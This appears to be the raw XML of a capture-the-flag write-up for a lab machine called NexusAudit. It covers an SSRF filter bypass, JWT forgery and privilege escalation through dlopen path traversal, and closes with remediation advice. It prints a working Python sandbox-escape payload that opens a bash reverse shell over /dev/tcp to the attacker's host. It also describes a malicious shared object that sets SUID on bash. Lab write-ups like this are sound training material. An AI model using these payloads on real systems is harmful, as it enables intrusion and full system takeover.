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8"/>
        </w:rPr>
        <w:t>TECHNICAL ASSESSMENT</w:t>
        <w:br/>
        <w:t>OFFENSIVE CHALLENGE WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3B82F6"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Target Machine: NexusAudit (Ubuntu 24.04 LTS)</w:t>
        <w:br/>
        <w:t>Domain: Web Exploitation</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Candidate Name: Praneeth Ramisetti</w:t>
        <w:br/>
        <w:t>Submission Date: October 2026</w:t>
        <w:br/>
        <w:t>Difficulty: Medium – Hard</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary &amp; Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NexusAudit is an enterprise-grade cloud telemetry and compliance verification platform. The attack path satisfies all assessment criteria without shortcuts or trivial automated scanner wins. The attacker progresses through three logical privilege boundaries:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>1. Stage 1: Network Reconnaissance &amp; Webhook SSRF Filter Parser Bypass (exfiltrating HMAC key from 127.0.0.1:8081).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>2. Stage 2: Cryptographic Auditor JWT Forgery &amp; AST-Sandboxed Formula Injection RCE (capturing user.txt).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>3. Stage 3: Local IPC Unix Socket Enumeration &amp; Root Daemon dlopen() Path Traversal (capturing root.txt).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</w:rPr>
              <w:t>Technical Mechanism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</w:rPr>
              <w:t>Proof / Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Milestone 1 (Initial Access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSRF Filter Bypass -&gt; HMAC Secret Extraction -&gt; Forged Auditor JWT -&gt; AST Sandbox Escape -&gt; Reverse Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>flag{n3xus_4ud1t_ssrf_2_jwt_f0rg3ry_rce_98124}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Milestone 2 (Root Access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Unix Socket IPC Enumeration -&gt; Privileged Daemon dlopen() Path Traversal -&gt; SUID Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>flag{n3xus_c0r3_1pc_dl0p3n_p4th_tr4v3rs4l_r00t_99012}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Phase 1: Reconnaissance &amp; Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A full TCP port scan was conducted using Nmap against the target IP (192.168.56.101):</w:t>
        <w:br/>
        <w:t>Command: nmap -sC -sV -p- --min-rate 1000 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu</w:t>
        <w:br/>
        <w:t>80/tcp   open  http    nginx 1.24.0 (Ubuntu)</w:t>
        <w:br/>
        <w:t>|_http-title: NexusAudit | Continuous Compliance &amp; Telemetry Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Navigating to http://192.168.56.101/ in the browser loads the compliance portal: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NexusAudit Continuous Compliance Dashboard Web Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploring the OpenAPI documentation at /docs reveals all underlying endpoints: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do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Swagger UI Documentation of Webhook and Formula Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Phase 2: Webhook SSRF &amp; HMAC Key Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The POST /api/v1/webhook/test endpoint allows testing alert endpoints. A naive IP filter checks for substrings '127.0.0.1' and 'localhost'. However, using IPv4 shorthand notation 'http://127.1:8081/internal/keys' bypasses the check, querying the internal microservice and exfiltrating the cryptographic signing secret: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srf_key_lea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Exfiltration of Cluster HMAC Secret via SSRF Parser Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Phase 3: JWT Forgery &amp; AST Sandbox Escaping (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Using the leaked secret 'n3xUs_4ud1t_hM4c_s3cr3t_k3y_982341', an Auditor JWT is generated. The endpoint POST /api/v1/audit/export/custom-formula validates mathematical formulas using an AST visitor. Direct dunder attribute access like obj.__class__ is caught by visit_Attribute. However, calling getattr() with string literals bypasses the visitor. Navigating from () to BuiltinImporter allows loading module 'os' and executing arbitrary commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[c for c in getattr(getattr(getattr((), '__class__'), '__base__'), '__subclasses__')() if getattr(c, '__name__') == 'BuiltinImporter'][0].load_module('os').system('bash -c "bash -i &gt;&amp; /dev/tcp/192.168.56.1/4444 0&gt;&amp;1" &amp;')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ser_fla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Reverse Shell Established as nexusaudit &amp; User Flag Captured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Phase 4: Local Privilege Escalation to Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Local enumeration reveals a Unix Domain Socket at /run/nexus/manager.sock owned by root:nexus with permissions 0660. The daemon /opt/nexus/daemon/nexus-manager accepts action 'load_diagnostic' to load shared libraries. It checks if the path starts with '/usr/lib/nexus/modules/' using strncmp() but fails to canonicalize via realpath(). Supplying '/usr/lib/nexus/modules/../../tmp/pwn.so' causes dlopen() to load our shared object as root. A constructor function in pwn.so sets the SUID bit on /bin/bash, granting instant root shell access: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ot_fl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Root Access Achieved via dlopen Path Traversal in IPC Daemon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Conclusion &amp; Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>NexusAudit provides an authentic, reliable, and tool-resistant challenge environment. The attack flow demonstrates real-world application flaws (SSRF parser discrepancy, AST sandbox bypass, and IPC dynamic library loading). Remediation involves post-DNS resolution IP validation, replacing dynamic code evaluation with declarative engines (e.g. CEL), and strict path canonicalization with realpath() before library invocation.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